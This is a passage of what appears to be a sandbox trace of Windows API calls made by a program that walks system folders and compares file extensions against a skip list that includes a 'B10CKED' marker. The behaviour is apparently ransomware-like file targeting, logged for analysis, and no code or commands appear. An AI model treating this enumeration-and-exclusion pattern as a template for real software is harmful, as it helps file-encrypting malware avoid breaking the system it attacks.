CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.183] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="PNG", cchCount2=3) returned 1 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="PNG", cchCount2=3) returned 3 [0108.184] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="PNG", cchCount2=3) returned 1 [0108.184] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0108.185] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{8702D817-5AAD-4674-9EF3-4D3DECD87120}\\") returned 0x58 [0108.186] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0x1c7fe8 [0108.186] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.186] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.186] CharUpperBuffW (in: lpsz="png", cchLength=0x3 | out: lpsz="PNG") returned 0x3 [0108.186] CharUpperBuffW (in: lpsz="xml", cchLength=0x3 | out: lpsz="XML") returned 0x3 [0108.186] CharUpperBuffW (in: lpsz="png", cchLength=0x3 | out: lpsz="PNG") returned 0x3 [0108.186] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0108.186] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0 [0108.187] FindClose (in: hFindFile=0x1c7fa8 | out: hFindFile=0x1c7fa8) returned 1 [0108.187] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", cchLength=0x2f | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\") returned 0x2f [0108.187] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*.*", lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0x1c7fa8 [0108.228] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0108.228] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", cchLength=0x56 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\") returned 0x56 [0108.228] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0x1c7fe8 [0108.398] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.398] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\TASK\\{07DEB856-FC6E-4FB9-8ADD-D8F2CF8722C9}\\EN-US\\") returned 0x5c [0108.398] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device 